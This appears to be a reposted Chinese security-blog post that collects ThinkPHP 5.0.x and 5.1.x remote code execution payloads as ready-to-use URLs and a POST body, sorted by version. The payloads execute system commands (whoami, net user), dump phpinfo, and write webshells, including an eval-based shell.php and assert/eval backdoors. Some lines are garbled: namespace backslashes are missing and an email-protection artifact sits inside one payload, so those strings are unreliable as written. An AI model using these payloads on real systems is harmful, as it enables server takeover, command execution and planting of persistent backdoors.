Thinkphp5.0.X系列再报0day

  • A+
所属分类:安全文章

蹭个热度

url为:http://www.xxx.com/public/index.php?s=captcha

post提交

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=net user

Thinkphp5.0.X系列再报0day



再整理一下之前thinkphp5x系列的0day  




  1. 利用system函数远程命令执行

http://localhost:9096/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami



2.通过phpinfo函数写出phpinfo()的信息


http://localhost:9096/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1



3.写入shell:


http://localhost:9096/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_GET["code"])?^>>shell.php


http://localhost/thinkphp5.1/html/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php?echo?'ok';?>

--------------------- 












/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][][email protected]($_GET['fuck']);&fuck=phpinfo();

/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][][email protected]($_GET['fuck']);&fuck=eval($_POST[ian]);


/public/index.php?s=index/thinkContainer/invokefunction&function=call_user_func&vars[0]=phpinfo&vars[1]=1










POC

TP版本5.0.21:

http://localhost/thinkphp_5.0.21/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami



http://localhost/thinkphp_5.0.21/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1




TP版本5.0.22:

http://url/to/thinkphp_5.0.22/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami


http://url/to/thinkphp_5.0.22/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1





TP5.1.*

thinkphp5.1.29为例


1、代码执行:

http://url/to/thinkphp5.1.29/?s=index/thinkRequest/input&filter=phpinfo&data=1


2、命令执行:

http://url/to/thinkphp5.1.29/?s=index/thinkRequest/input&filter=system&data=操作系统命令


3、文件写入(写shell):

http://url/to/thinkphp5.1.29/?s=index/thinktemplatedriverfile/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E


4、未知:

http://url/to/thinkphp5.1.29/?s=index/thinkviewdriverPhp/display&content=%3C?php%20phpinfo();?%3E


5、代码执行:

http://url/to/thinkphp5.1.29/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1


6、命令执行:

http://url/to/thinkphp5.1.29/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=操作系统命令


7、代码执行:

http://url/to/thinkphp5.1.29/?s=index/thinkContainer/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1


8、命令执行:

http://url/to/thinkphp5.1.29/?s=index/thinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=操作系统命令







本文始发于微信公众号(零组攻防实验室):Thinkphp5.0.X系列再报0day

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: